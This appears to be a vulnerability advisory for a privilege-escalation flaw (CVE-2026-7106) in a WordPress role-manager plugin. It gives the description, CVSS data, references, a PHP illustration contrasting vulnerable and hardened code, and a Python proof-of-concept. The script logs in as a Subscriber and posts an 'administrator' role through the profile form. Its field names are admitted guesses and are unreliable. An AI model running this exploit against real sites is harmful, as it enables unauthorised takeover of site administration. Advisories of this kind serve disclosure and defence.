Security Vulnerability Report
CVE-2026-7106 CVSS 8.8 HIGH

Published: 2026-04-27 03:16:00
Last Modified: 2026-04-27 18:38:49

Description

The Highland Software Custom Role Manager plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 1.0.0. This is due to insufficient authorization checks in the hscrm_save_user_roles() function, which is hooked to the personal_options_update action accessible by any authenticated user. This makes it possible for authenticated attackers, with Subscriber-level access or higher, to potentially modify user roles via the profile update form.
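The flaw described above is a missing authorization check on a handler attached to personal_options_update, a hook every logged-in user can trigger by saving their own profile. The following is an added illustration of that pattern beside a hardened form; it is not the plugin's own code, and the field name hscrm_roles, the nonce names and the function names are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Field and nonce names are assumptions.

// Vulnerable pattern: personal_options_update fires for every authenticated user
// saving their own profile, so trusting a posted role value lets a Subscriber
// assign themselves any role. No capability check, no nonce, no role whitelist.
function hscrm_save_user_roles_vulnerable( $user_id ) {
    if ( isset( $_POST['hscrm_roles'] ) ) {
        $user = new WP_User( $user_id );
        $user->set_role( sanitize_key( wp_unslash( $_POST['hscrm_roles'] ) ) );
    }
}

// Hardened pattern: require the capability WordPress itself uses for role
// changes, confirm the caller may edit this specific user, verify a nonce bound
// to the form, and accept only roles the caller is permitted to grant.
function hscrm_save_user_roles_hardened( $user_id ) {
    if ( ! isset( $_POST['hscrm_roles'] ) ) {
        return;
    }
    if ( ! current_user_can( 'promote_users' ) || ! current_user_can( 'edit_user', $user_id ) ) {
        return;
    }
    // 'hscrm_roles_nonce' and 'hscrm_save_roles' are assumed names for this illustration.
    if ( ! isset( $_POST['hscrm_roles_nonce'] )
        || ! wp_verify_nonce( sanitize_key( $_POST['hscrm_roles_nonce'] ), 'hscrm_save_roles' ) ) {
        return;
    }
    $role = sanitize_key( wp_unslash( $_POST['hscrm_roles'] ) );
    // get_editable_roles() excludes roles the current user is not allowed to assign.
    if ( ! array_key_exists( $role, get_editable_roles() ) ) {
        return;
    }
    $user = new WP_User( $user_id );
    $user->set_role( $role );
}

// personal_options_update fires when a user saves their own profile;
// edit_user_profile_update fires when someone with edit rights saves another user's profile.
add_action( 'personal_options_update', 'hscrm_save_user_roles_hardened' );
add_action( 'edit_user_profile_update', 'hscrm_save_user_roles_hardened' );
```

When reviewing a plugin for this class of bug, look for any role-changing or capability-changing call reachable from personal_options_update or profile_update that is not guarded by a capability check of its own; the hook firing is not evidence of authorization.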

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Highland Software Custom Role Manager <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Exploit Title: WordPress Highland Software Custom Role Manager < 1.0.0 - Privilege Escalation
# Date: 2026-04-27
# Exploit Author: Analyst
# Vendor Homepage: https://wordpress.org/
# Software Link: https://wordpress.org/plugins/highland-software-custom-role-manager/
# Version: <= 1.0.0
# CVE: CVE-2026-7106


def exploit(target_url, username, password):
    session = requests.Session()
    login_url = f"{target_url}/wp-login.php"
    profile_url = f"{target_url}/wp-admin/profile.php"

    # Step 1: Authenticate as a low-privileged user (e.g., Subscriber)
    login_data = {
        "log": username,
        "pwd": password,
        "redirect_to": profile_url,
        "wp-submit": "Log In",
        "testcookie": "1",
    }
    session.post(login_url, data=login_data)

    # Step 2: Send payload to update user role via profile update
    # The vulnerable hook 'personal_options_update' triggers hscrm_save_user_roles()
    # We inject the desired role (e.g., 'administrator') into the request
    exploit_data = {
        "from": "profile",
        "checkuser_id": "1",  # May need to be adjusted
        "user_id": "2",  # The ID of the user being modified (attacker's ID)
        "action": "update",
        # The vulnerable plugin likely expects a role parameter here
        "hscrm_role": "administrator",
        "submit": "Update Profile",
    }
    response = session.post(profile_url, data=exploit_data)

    if response.status_code == 200:
        print("[+] Payload sent. Check if user role has been escalated.")
    else:
        print("[-] Exploit failed.")


if __name__ == "__main__":
    exploit("http://target-site.com", "subscriber", "password")
```

Weakness

CWE-269 (Improper Privilege Management)

References

- https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.0/includes/user-ui.php#L203
- https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.0/includes/user-ui.php#L223
- https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.0/includes/user-ui.php#L289
- https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.1/includes/user-ui.php#L203
- https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/trunk/includes/user-ui.php#L203
- https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/trunk/includes/user-ui.php#L223
- https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/trunk/includes/user-ui.php#L289
- https://www.wordfence.com/threat-intel/vulnerabilities/id/80a258a6-634c-4d7d-981f-bcbc0bb044f7?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-7106", "sourceIdentifier": "[email protected]", "published": "2026-04-27T03:16:00.297", "lastModified": "2026-04-27T18:38:48.527", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Highland Software Custom Role Manager plugin for WordPress is vulnerable to Privilege Escalation in versions up to and including 1.0.0. This is due to insufficient authorization checks in the hscrm_save_user_roles() function, which is hooked to the personal_options_update action accessible by any authenticated user. This makes it possible for authenticated attackers, with Subscriber-level access or higher, to potentially modify user roles via the profile update form."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.0/includes/user-ui.php#L203", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.0/includes/user-ui.php#L223", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.0/includes/user-ui.php#L289", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/tags/1.0.1/includes/user-ui.php#L203", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/trunk/includes/user-ui.php#L203", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/trunk/includes/user-ui.php#L223", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/highland-software-custom-role-manager/trunk/includes/user-ui.php#L289", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/80a258a6-634c-4d7d-981f-bcbc0bb044f7?source=cve", "source": "[email protected]"}]}}
```